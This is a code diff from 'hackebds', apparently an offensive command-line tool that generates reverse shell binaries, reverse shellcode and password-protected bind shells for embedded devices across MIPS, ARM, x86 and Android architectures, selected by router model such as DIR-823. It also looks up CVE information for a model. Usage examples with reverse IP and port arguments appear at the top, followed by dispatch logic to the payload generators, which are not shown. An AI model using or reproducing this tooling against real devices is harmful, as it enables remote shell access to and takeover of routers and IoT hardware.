+	Once:    hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -arch mips -model DIR-823 -res reverse_shell_file 
+	Second: hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -model DIR-823 -res reverse_shell_file 
 
-	if (args.res == "reverse_shellcode"):
+	Generate reverse_shellcode Corresponding architecture:
+	Once:    hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -arch mips -model DIR-823 -res reverse_shellcode
+	Second: hackebds -reverse_ip 127.0.0.1 -reverse_port 8080 -model DIR-823 -res reverse_shellcode
+
+	Generate bind_shell Corresponding architecture:
+	Once:    hackebds -bind_port 8080 -passwd 1234 -arch mips -model DIR-823 -res bind_shell
+	Second: hackebds -bind_port 8080 -passwd 1234  -model DIR-823 -res bind_shell
+
+	model for CVE info(Online or localfile):
+	hackebds -model DIR-823 -res cveinfo
+	'''
+	parser = argparse.ArgumentParser(example)
+	parser.add_argument('-reverse_ip', required=False, type=str, default=None, help='reverse_ip set')
+	parser.add_argument('-reverse_port', required=False, type=int, default=None ,help='reverse_port set')
+	parser.add_argument('-arch', required=False, type=str, help='Target arch architecturet', choices=('mips','mipsel','mips64','mipsel64','armelv5','armelv7','armebv5','armebv7','aarch64','x86','x64','aarch64','android'))
+	parser.add_argument('-res', required=True, type=str,default="reverse_shell_file", choices=('reverse_shell_file', 'reverse_shellcode', 'bind_shell','cveinfo'))
+	parser.add_argument('-passwd', required=False, type=str,default=None)
+	parser.add_argument('-model', required=False, type=str,default=None, help='device model,learn module')
+	parser.add_argument('-bind_port', required=False, type=int,default=None, help='bind_shell port')
+	parser.add_argument('-filename', required=False, type=str,default=None, help='Generate file name')
+	#parser.add_argument("-v","--version", help="version",action="store_true")
+	#parser.add_argument('-cveinfo', action='store_true',required=False, help='Generate file name')
+	flag_cve_info = 0
+	#@with_argparser(argparse)
+	args = parser.parse_args()
+	#module_choices.moddel_to_arch(mod)
+	if (os.path.exists("/tmp/hackebds_model_table")):
+		pass
+	else:
+		model_choise.touchfile()
+	log.success("Data file detection")
+	if(args.arch != None and args.model != None):
+		flag_cve_info = 1
 		try:
-			num_getreverse_shellcode(arch_get_number(args.arch), args.reverse_ip, args.reverse_port)
+			#print("doudoudedi")
+			args.arch = model_choise.model_to_arch(args.model)
+			#print(args.arch)
 		except Exception as e:
-			log.info("The function is still under development. Please wait")
+			log.info("There is no cross reference relationship locally, adding the corresponding relationship")
+			#print(e)
+			if (args.arch ==None):
+				log.info("arch not set")
+				return
+			log.info("Please make sure arch is set correctly, If necessary, you can modify /tmp/hackebds_model_table")
+			log.success("{} ---> {}, After that, you only need to specify {}, not the arch".format(args.model ,args.arch, args.model))
+			#print(args.arch)
+			#print(args.model)
+			model_choise.append_to_tree(args.model, args.arch)
+
+	if (args.model != None and args.arch==None):
+		try:
+			flag_cve_info  = 1
+			args.arch = model_choise.model_to_arch(args.model)
+		except:
+			log.info("There is no cross reference relationship locally, please set -arch building relationships")
+
+	if(args.model == None and args.arch==None):
+		log.error("please set arch or model")
+
+	if (args.res == "reverse_shell_file" and args.arch != None):
+		if (args.reverse_ip!=None or args.reverse_port != None):
+			try:
+				#module_choices.moddel_to_arch(mod)
+				num_getreverse_file(arch_get_number(args.arch), args.reverse_ip, args.reverse_port, args.filename)
+			except Exception as e:
+			#	print(e)
+				log.info("The function is still under development. Please wait")
+		else:
+			log.error("please set reverse_ip or reverse_port")
+			return 
+
+	if (args.res == "reverse_shellcode" and args.arch != None):
+		if (args.reverse_ip!=None or args.reverse_port != None):
+			try:
+				num_getreverse_shellcode(arch_get_number(args.arch), args.reverse_ip, args.reverse_port)
+			except Exception as e:
+				print(e)
+				log.info("The function is still under development. Please wait")
+		else:
+			log.error("please set reverse_ip or reverse_port")
+			return 
 	if (args.res == "bind_shell"):
 		try:
-			if (args.passwd==None):
-				log.error("please set bind passwd")
+			if (args.passwd==None or args.bind_port == None and args.arch!=None ):
+				log.error("please set bind passwd or bind_port")
 				return
-			num_getbind_shell(arch_get_number(args.arch), args.reverse_port, args.passwd)
+			num_getbind_shell(arch_get_number(args.arch), args.bind_port, args.passwd, args.filename)
 		except Exception as e:
+			log.info("The function is still under development. Please wait")
 			#print(e)
-			pass
+			#pass
+	if (flag_cve_info == 1 and args.res=="cveinfo" ):
+		cve_info.main(args.model)
 
 
 
